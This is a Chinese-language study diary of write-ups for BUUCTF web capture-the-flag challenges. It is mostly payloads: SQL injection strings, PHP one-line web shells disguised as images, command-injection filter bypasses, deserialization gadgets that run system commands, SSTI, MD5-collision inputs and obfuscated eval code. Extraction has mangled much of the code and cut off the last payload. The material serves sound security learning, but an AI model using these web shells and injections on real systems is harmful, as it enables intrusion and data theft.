学习日记-5(buu) awovkj 2025-11-10 2026-01-10 [极客大挑战 2019]EasySQL 万能密码 admin’ or 1=1# 密码随便
[极客大挑战 2019]Havefun 查看源码?cat=dog
[ACTF2020 新生赛]Include 直接伪协议
[HCTF 2018]WarmUp 查看源码发现source.php,然后有发现hint.php,发现ffffllllaaaagggg
1 ?file=source.php?../../../../../ffffllllaaaagggg
[ACTF2020 新生赛]Exec [GXYCTF2019]Ping Ping Ping 通过尝试发现” ‘ ? * flag \ {等被禁
1 ?ip=127.0 .0.1 |cat$IFS `ls`;然后查看源码
[极客大挑战 2019]Secret File 查看源码发现/Archive_room.php,点击按钮后快速跳转网页,进行抓包发现
secr3t.php
使用伪协议
[ACTF2020 新生赛]BackupFile 使用dirsearch扫,发现/index.php.bak,下载后查看发现代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <?php include_once "flag.php" ;if (isset ($_GET ['key' ])) { $key = $_GET ['key' ]; if (!is_numeric ($key )) { exit ("Just num!" ); } $key = intval ($key ); $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3" ; if ($key == $str ) { echo $flag ; } } else { echo "Try to find out source file!" ; }
[极客大挑战 2019]Upload 上传文件抓包,发现直接改后缀没用,修改Content-Type文件内容格式为image/png
尝试发现可以使用phtml作为后缀,同时过滤<?,将一句话木马改为
1 2 3 <script language="php" > @system ($_GET ['c' ]); </script>
发现还是不行,在前面添加一个GIF89a(相当于在16进制格式添加gif文件头)成功上传
1 2 3 **GIF89a**<script language="php" > @system ($_GET ['c' ]); </script>
访问/upload/1.phtml
[ACTF2020 新生赛]Upload 传简单的一句话木马的png抓包改为phtml
[MRCTF2020]你传你🐎呢 上传文件.htaccess
1 2 3 <FilesMatch "1.png" > SetHandler application/x-httpd-php </FilesMatch>
上传文件1.png
1 <?php @eval ($_POST [1 ]);?>
Content-Type: 都改为image/jpeg,蚁剑连接,根目录找到flag
[GXYCTF2019]BabyUpload 步骤与上一题一样,一句话木马改为
1 <script language="php" >@eval ($_POST [1 ]);</script>
[极客大挑战 2019]Knife 直接蚁剑连接,flag在根目录
[极客大挑战 2019]PHP 使用dirsearch扫发现/www.zip,下载解压发现是反序列化
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 <?php class Name private $username = 'admin' ; private $password = '100' ; public function __construct ($username ,$password $this ->username = $username ; $this ->password = $password ; } function __wakeup ( $this ->username = 'guest' ; } function __destruct ( if ($this ->password != 100 ) { echo "</br>NO!!!hacker!!!</br>" ; echo "You name is: " ; echo $this ->username;echo "</br>" ; echo "You password is: " ; echo $this ->password;echo "</br>" ; die (); } if ($this ->username === 'admin' ) { global $flag ; echo $flag ; }else { echo "</br>hello my friend~~</br>sorry i can't give you the flag!" ; die (); } } } echo serialize (new Name ('admin' , 100 ));?> ?>
利用对象属性个数的值大于真实属性个数绕过__wakeup()
1 O:4 :"Name" :3 :{s:14 :"%00Name%00username" ;s:5 :"admin" ;s:14 :"%00Name%00password" ;i:100 ;}
[极客大挑战 2019]BuyFlag 在payflag页面查看源码,发现相关信息
1 2 3 4 5 6 7 8 9 ~post money and password~~~ if (isset ($_POST ['password' ])) { $password = $_POST ['password' ]; if (is_numeric ($password )) { echo "password can't be number</br>" ; }elseif ($password == 404 ) { echo "Password Right!</br>" ; } }
直接传发现没反应,用bp抓包,传了还是没反应,看见cookie:user=0,改为1
提示Nember lenth is too long
改为科学计数法
1 money=10e8 &password=404 a
[RoarCTF 2019]Easy Calc 查看源码发现calc.php
利用%20绕过对num的检测,查看phpinfo()可以看到禁用函数
利用chr函数构造进行绕过
1 2 ?%20 num=print_r (scandir (chr (0x2f )));
1 2 file_get_contents (chr (0x2f ).chr (0x66 ).chr (0x31 ).chr (0x61 ).chr (0x67 ).chr (0x67 ));
[HCTF 2018]admin 直接爆破,密码是123
[ZJCTF 2019]NiZhuanSiWei 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?php $text = $_GET ["text" ];$file = $_GET ["file" ];$password = $_GET ["password" ];if (isset ($text )&&(file_get_contents ($text ,'r' )==="welcome to the zjctf" )){ echo "<br><h1>" .file_get_contents ($text ,'r' )."</h1></br>" ; if (preg_match ("/flag/" ,$file )){ echo "Not now!" ; exit (); }else { include ($file ); $password = unserialize ($password ); echo $password ; } } else { highlight_file (__FILE__ ); } ?>
通过data协议包含输入流然后利用伪协议读取useless.php
解码后得到
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php class Flag public $file ; public function __tostring ( if (isset ($this ->file)){ echo file_get_contents ($this ->file); echo "<br>" ; return ("U R SO CLOSE !///COME ON PLZ" ); } } } ?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php class Flag public $file = 'flag.php' ; public function __tostring ( if (isset ($this ->file)){ echo file_get_contents ($this ->file); echo "<br>" ; return ("U R SO CLOSE !///COME ON PLZ" ); } } } echo serialize (new Flag );?>
即可
[MRCTF2020]Ez_bypass 1 2 ?id[]=a&gg[]=s; passwd=1234567 a
即可
[网鼎杯 2020 青龙组]AreUSerialz 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 <?php include ("flag.php" );highlight_file (__FILE__ );class FileHandler protected $op ; protected $filename ; protected $content ; function __construct ( $op = "1" ; $filename = "/tmp/tmpfile" ; $content = "Hello World!" ; $this ->process (); } public function process ( if ($this ->op == "1" ) { $this ->write (); } else if ($this ->op == "2" ) { $res = $this ->read (); $this ->output ($res ); } else { $this ->output ("Bad Hacker!" ); } } private function write ( if (isset ($this ->filename) && isset ($this ->content)) { if (strlen ((string )$this ->content) > 100 ) { $this ->output ("Too long!" ); die (); } $res = file_put_contents ($this ->filename, $this ->content); if ($res ) $this ->output ("Successful!" ); else $this ->output ("Failed!" ); } else { $this ->output ("Failed!" ); } } private function read ( $res = "" ; if (isset ($this ->filename)) { $res = file_get_contents ($this ->filename); } return $res ; } private function output ($s echo "[Result]: <br>" ; echo $s ; } function __destruct ( if ($this ->op === "2" ) $this ->op = "1" ; $this ->content = "" ; $this ->process (); } } function is_valid ($s for ($i = 0 ; $i < strlen ($s ); $i ++) if (!(ord ($s [$i ]) >= 32 && ord ($s [$i ]) <= 125 )) return false ; return true ; } if (isset ($_GET {'str' })) { $str = (string )$_GET ['str' ]; if (is_valid ($str )) { $obj = unserialize ($str ); } }
可以发现如果要触发flag
1 2 3 4 5 6 7 8 9 10 11 12 13 <?php class FileHandler protected $op = 2 ; protected $filename = 'php://filter/convert.base64-encode/resource=flag,php' ; protected $content ; } echo serialize (new FileHandler ());
由于is_valid($s)限制,无法成功获取flag
php7.1+反序列化对类属性不敏感
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php class FileHandler public $op = 2 ; public $filename = 'php://filter/convert.base64-encode/resource=flag,php' ; public $content ; } echo serialize (new FileHandler ());解密即可
[NPUCTF2020]ReadlezPHP 查看源码,发现time.php?source
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 <?php class HelloPhp public $a ; public $b ; public function __construct ( $this ->a = "Y-m-d h:i:s" ; $this ->b = "date" ; } public function __destruct ( $a = $this ->a; $b = $this ->b; echo $b ($a ); } } $c = new HelloPhp ;if (isset ($_GET ['source' ])){ highlight_file (__FILE__ ); die (0 ); } @$ppp = unserialize ($_GET ["data" ]);
assert是php之中的断言,如果传入的是字符串则会把它作为php代码执行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php class HelloPhp public $a ; public $b ; public function __construct ( $this ->a = "phpinfo()" ; $this ->b = "assert" ; } public function __destruct ( $a = $this ->a; $b = $this ->b; echo $b ($a ); } } $c = new HelloPhp ;echo serialize ($c );
[BSidesCF 2020]Had a bad day 随便点一点发现?category=woofers,猜测直接命令执行,结果显示Sorry, we currently only support woofers and meowers.并且后面会拼接.php尝试截断发现Warning : include()…
应该就是文件包含,然后直接伪协议
[网鼎杯 2020 朱雀组]phpweb 抓包发现参数尝试看目录失败,尝试看文件
1 func=file_get_contents&p=index.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 <?php $disable_fun = array ("exec" ,"shell_exec" ,"system" ,"passthru" ,"proc_open" ,"show_source" ,"phpinfo" ,"popen" ,"dl" ,"eval" ,"proc_terminate" ,"touch" ,"escapeshellcmd" ,"escapeshellarg" ,"assert" ,"substr_replace" ,"call_user_func_array" ,"call_user_func" ,"array_filter" , "array_walk" , "array_map" ,"registregister_shutdown_function" ,"register_tick_function" ,"filter_var" , "filter_var_array" , "uasort" , "uksort" , "array_reduce" ,"array_walk" , "array_walk_recursive" ,"pcntl_exec" ,"fopen" ,"fwrite" ,"file_put_contents" ); function gettime ($func , $p $result = call_user_func ($func , $p ); $a = gettype ($result ); if ($a == "string" ) { return $result ; } else {return "" ;} } class Test var $p = "Y-m-d h:i:s a" ; var $func = "date" ; function __destruct ( if ($this ->func != "" ) { echo gettime ($this ->func, $this ->p); } } } $func = $_REQUEST ["func" ]; $p = $_REQUEST ["p" ]; if ($func != null ) { $func = strtolower ($func ); if (!in_array ($func ,$disable_fun )) { echo gettime ($func , $p ); }else { die ("Hacker..." ); } }
应该是反序列化
1 2 3 4 5 6 7 8 9 10 <?php class Test var $p = "ls" ; var $func = "system" ; } $func = $_REQUEST ["func" ];$p = $_REQUEST ["p" ];echo serialize (new Test ());
1 2 3 4 5 6 7 8 9 10 11 12 13 慢慢找,发现在 /tmp/flagoefiu4r93 <?php class Test var $p = "cat /tmp/flagoefiu4r93" ; var $func = "system" ; } $func = $_REQUEST ["func" ];$p = $_REQUEST ["p" ];echo serialize (new Test ());
[BJDCTF2020]The mystery of ip 在flag.php看见ip,尝试修改xxf发现会回显修改的值,猜测是ssti
1 2 {{system ('ls /' )}} {{system ('cat /flag' )}}
[极客大挑战 2019]BabySQL 通过1’ 1=2—+发现是字符型注入,尝试发现有3列
通过爆破发现or and from ,select union where等会被替换为空
1 2 3 4 5 6 7 8 9 10 11 12 查看当前数据库,发现是geek 1 ' uunionnion sselectelect 1,2,database()--+ 查看所有数据库, Your password is ' information_schema,performance_schema,test,mysql,ctf,geek' 1' uunionnion sselectelect 1 ,2 ,group_concat (schema_name) ffromrom infoorrmation_schema.schemata--+查看ctf中表名Your password is 'Flag' 1 ' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=' ctf'--+1' uunionnion sselectelect 1 ,2 ,flag ffromrom ctf.Flag--+查看列名Your password is 'flag 1' uunionnion sselectelect 1 ,2 ,group_concat (column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='Flag' --+查看flag 1 ' uunionnion sselectelect 1,2,flag ffromrom ctf.Flag--+
[SUCTF 2019]EasySQL 通过爆破发现union,from,and,or,information等被禁
输入1,2,3时发现
Array ( [0] => 1 [1] => 2 [2] => 1 )
当查询时进行逻辑运算时会出现这种情况
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 mysql> select * from ctf; +------+------+------+-------------+ | 1 | 2 | 3 | flag | +------+------+------+-------------+ | 1 | 2 | 3 | flag{sanye} | | 1 | 2 | 3 | | | 1 | 2 | 3 | | | 1 | 2 | 3 | | | 1 | 2 | 3 | | | | | 3 | | +------+------+------+-------------+ mysql> select 1 ,2 ,3 ||flag from ctf; +---+---+---------+ | 1 | 2 | 3 ||flag | +---+---+---------+ | 1 | 2 | 1 | | 1 | 2 | 1 | | 1 | 2 | 1 | | 1 | 2 | 1 | | 1 | 2 | 1 | | 1 | 2 | 1 | +---+---+---------+ mysql> select 1 ,2 ,3 &&flag from ctf; +---+---+---------+ | 1 | 2 | 3 &&flag | +---+---+---------+ | 1 | 2 | 0 | SQL语言进行逻辑运算时以非数字字符开头的字符串始终被转为 0 | 1 | 2 | 0 | | 1 | 2 | 0 | | 1 | 2 | 0 | | 1 | 2 | 0 | | 1 | 2 | 0 | +---+---+---------+ 所以可以通过*,1 得到flag 当后面是||flag就可以通过set sql_mode=PIPES_AS_CONCAT将管道符 || 变成字符串连接运算符获得flag 1 ;set sql_mode=PIPES_AS_CONCAT;select 1
[极客大挑战 2019]LoveSQL 判断为字符型注入,闭合符为’,列数为3,使用union注入
1 2 3 4 5 6 7 8 获取库名 1 ' union select 1,2,database()# Your password is ' geek' 获取表名 Your password is ' geekuser,l0ve1ysq1' 1' union select 1 ,2 ,group_concat (table_name) from information_schema.tables where table_schema='geek' 获取列名 Your password is 'id,username,password' 1 ' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=' l0ve1ysq1'# 获取username,password得到flag 1' union select 1 ,2 ,group_concat (username,password) from l0ve1ysq1
[GXYCTF2019]BabySQli 字符型注入,’闭合,有3列,查看源码发现有大串编码,解密得到:select * from user where username = ‘$name’
传入admin发现会由之前wrong user变为wrong pass 说明有admin账户
通过
1 1 ’ union select 1 ,'admin' ,2
看一篇wp说直接猜测search.php源码,直接人麻了,翻了几篇博客才发现题目那里可以看源码
会对传入的密码进行MD5加密然后与数据库的密码对比,若为真就输出flag
联合查询并不存在的数据时,联合查询就会构造一个 虚拟的数据表
1 2 3 4 5 6 7 8 9 10 11 mysql> select * from ctf union select 'admin' ,1 ,flag,3 from ctf -> ; +-------+------+--------------+--------------+ | 1 | 2 | 3 | flag | +-------+------+--------------+--------------+ | 1 | 2 | 3 | 1 flag{sanye} | | 1 | 2 | 3 | | | | | 3 | | | admin | 1 | 1 flag{sanye} | 3 | | admin | 1 | | 3 | +-------+------+--------------+--------------+
1 name=1 ' union select 1,' admin',' c4ca4238a0b923820dcc509a6f75849b'#&pw=1
[安洵杯 2019]easy_web 抓包发现?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
将结果解码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 <?php error_reporting (E_ALL || ~ E_NOTICE);header ('content-type:text/html;charset=utf-8' );$cmd = $_GET ['cmd' ];if (!isset ($_GET ['img' ]) || !isset ($_GET ['cmd' ])) header ('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=' ); $file = hex2bin (base64_decode (base64_decode ($_GET ['img' ])));$file = preg_replace ("/[^a-zA-Z0-9.]+/" , "" , $file );if (preg_match ("/flag/i" , $file )) { echo '<img src ="./ctf3.jpeg">' ; die ("xixi~ no flag" ); } else { $txt = base64_encode (file_get_contents ($file )); echo "<img src='data:image/gif;base64," . $txt . "'></img>" ; echo "<br>" ; } echo $cmd ;echo "<br>" ;if (preg_match ("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i" , $cmd )) { echo ("forbid ~" ); echo "<br>" ; } else { if ((string )$_POST ['a' ] !== (string )$_POST ['b' ] && md5 ($_POST ['a' ]) === md5 ($_POST ['b' ])) { echo `$cmd `; } else { echo ("md5 is funny ~" ); } } ?> <html> <style> body{ background:url (./bj.png) no-repeat center center; background-size:cover; background-attachment:fixed; background-color: } </style> <body> </body> </html>
利用\绕过命令的过滤,由于进行了类型转换,不能使用数组
使用以下进行md5强比较绕过
1 2 3 4 5 6 7 8 %4 d%c9%68 %ff%0 e%e3%5 c%20 %95 %72 %d4%77 %7 b%72 %15 %87 %d3%6 f%a7%b2%1 b%dc%56 %b7%4 a%3 d%c0%78 %3 e%7 b%95 %18 %af%bf%a2%02 %a8%28 %4 b%f3%6 e%8 e%4 b%55 %b3%5 f%42 %75 %93 %d8%49 %67 %6 d%a0%d1%d5%5 d%83 %60 %fb%5 f%07 %fe%a2 与 %4 d%c9%68 %ff%0 e%e3%5 c%20 %95 %72 %d4%77 %7 b%72 %15 %87 %d3%6 f%a7%b2%1 b%dc%56 %b7%4 a%3 d%c0%78 %3 e%7 b%95 %18 %af%bf%a2%00 %a8%28 %4 b%f3%6 e%8 e%4 b%55 %b3%5 f%42 %75 %93 %d8%49 %67 %6 d%a0%d1%55 %5 d%83 %60 %fb%5 f%07 %fe%a2 或者 M%C9h%FF%0 E%E3%5 C%20 %95 r%D4w%7 Br%15 %87 %D3o%A7%B2%1 B%DCV%B7J%3 D%C0x%3 E%7 B%95 %18 %AF%BF%A2%02 %A8%28 K%F3n%8 EKU%B3_Bu%93 %D8Igm%A0%D1%D5%5 D%83 %60 %FB_%07 %FE%A2 与 M%C9h%FF%0 E%E3%5 C%20 %95 r%D4w%7 Br%15 %87 %D3o%A7%B2%1 B%DCV%B7J%3 D%C0x%3 E%7 B%95 %18 %AF%BF%A2%00 %A8%28 K%F3n%8 EKU%B3_Bu%93 %D8Igm%A0%D1U%5 D%83 %60 %FB_%07 %FE%A2
[BJDCTF2020]ZJCTF,不过如此 通过php://input,php://filter进行绕过
抓包传入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /?text=php: Host: f340604a-c708-463 c-a700-82 cac6784ae3.node5.buuoj.cn:81 Content-Length: 14 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0 .0.0 Safari/537.36 Origin: http: Content-Type: text/plain Accept: text/html,application/xhtml+xml,application/xml;q=0.9 ,image/avif,image/webp,image/apng,*
将结果解码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 <?php $id = $_GET ['id' ];$_SESSION ['id' ] = $id ;function complex ($re , $str return preg_replace ( '/(' . $re . ')/ei' , 'strtolower("\\1")' , $str ); } foreach ($_GET as $re => $str ) { echo complex ($re , $str ). "\n" ; } function getFlag ( @eval ($_GET ['cmd' ]); }
获取第一个get传入的参数与它的值,通过正则\S*绕过
1 next.php?\S*=${getFlag ()}&cmd=system ('cat /flag' );
函数名
用途
作用对象
示例
处理效果
escapeshellarg()安全转义参数 单个参数值
ls 'abc; rm -rf /'加引号包裹 + 内部转义
escapeshellcmd()安全转义整个命令行 整条命令
ls\; cat /etc/passwd特殊字符前加反斜杠
1 2 3 4 两函数escapeshellarg (),escapeshellcmd ():先后调用会导致漏洞的产生 通过nmap 的-oG参数将代码与命令写到文件中 ?host=' <?php echo `cat /flag`;?> -oG 1.php ' 访问e6305cd14dbe6e1fc4041d81cb3fc9ee/1 .php即可得到flag
[极客大挑战 2019]RCE ME 无数字字母rce,通过取反构造进行绕过
1 2 3 4 5 6 <?php echo "(~" ,urlencode (~'phpinfo' ),')' ,'();' ;?code=(~%8 F%97 %8 F%96 %91 %99 %90 )();查看phpinfo eval 不是php函数不能直接用通过构造assert (eval ($_POST [1 ])); ?code (~%9 E%8 C%8 C%9 A%8 D%8 B)(~%D7%9 A%89 %9 E%93 %D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%D6);
使用蚁剑连接,flag在根目录但是看不到,通过插件绕过disable_functions执行/readflag得到flag
[网鼎杯 2018]Fakebook 注册账号并可以成功登录,发现?no=1尝试命令执行发现
[*] query error! (Unknown column ‘ls’ in ‘where clause’)
是sql注入
1 2 3 4 5 6 7 8 9 10 ?no=1 and 1 =2 会报错是数字型注入 ?no=1 group by 4 正常,5 报错,有4 列 看wp,union select被禁,通过绕过 ?no=-1 unionselect 1 ,2 ,3 ,4 --+发现会回显位2 no=-1 unionselect 1 ,database (),3 ,4 --+ fakebook ?no=-1 unionselect 1 ,group_concat (table_name),2 ,3 from information_schema.tables where table_schema='fakebook' --+ 表:users ?no=-1 unionselect 1 ,group_concat (column_name),2 ,3 from information_schema.columns where table_name='users' --+ no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS ?no=-1 unionselect 1 ,group_concat (username,passwd,data),2 ,3 from users --+
最后发现
sanye4e2e603ad32bb2e1335b383c6d4b9a6d353cca643f2808e389a06cb1af930dd661ba77ad76061192ef5baf562297bcc6aeb5e9580c7f6f7ec6b7a353fc96d03d
O:8:”UserInfo”:3{s:4:”name”;s:5:”sanye”;s:3:”age”;i:18;s:4:”blog”;s:5:”4.com “;}
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 <?php class UserInfo public $name = "" ; public $age = 0 ; public $blog = "" ; public function __construct ($name , $age , $blog { $this ->name = $name ; $this ->age = (int )$age ; $this ->blog = $blog ; } function get ($url { $ch = curl_init (); curl_setopt ($ch , CURLOPT_URL, $url ); curl_setopt ($ch , CURLOPT_RETURNTRANSFER, 1 ); $output = curl_exec ($ch ); $httpCode = curl_getinfo ($ch , CURLINFO_HTTP_CODE); if ($httpCode == 404 ) { return 404 ; } curl_close ($ch ); return $output ; } public function getBlogContents ( { return $this ->get ($this ->blog); } public function isValidBlog ( { $blog = $this ->blog; return preg_match ("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i" , $blog ); } }
1 2 3 4 5 6 7 8 9 10 <?php class UserInfo public $name = "sanye" ; public $age = 18 ; public $blog = "file:///var/www/html/flag.php" ; } echo serialize (new UserInfo ());
通过反序列化写入file://伪协议进行读取flag
1 ?no=-1 %20 unionselect%201 ,2 ,3 ,%27 O:8 :%22 UserInfo%22 :3 :{s:4 :%22 name%22 ;s:5 :%22 sanye%22 ;s:3 :%22 age%22 ;i:18 ;s:4 :%22 blog%22 ;s:29 :%22 file:
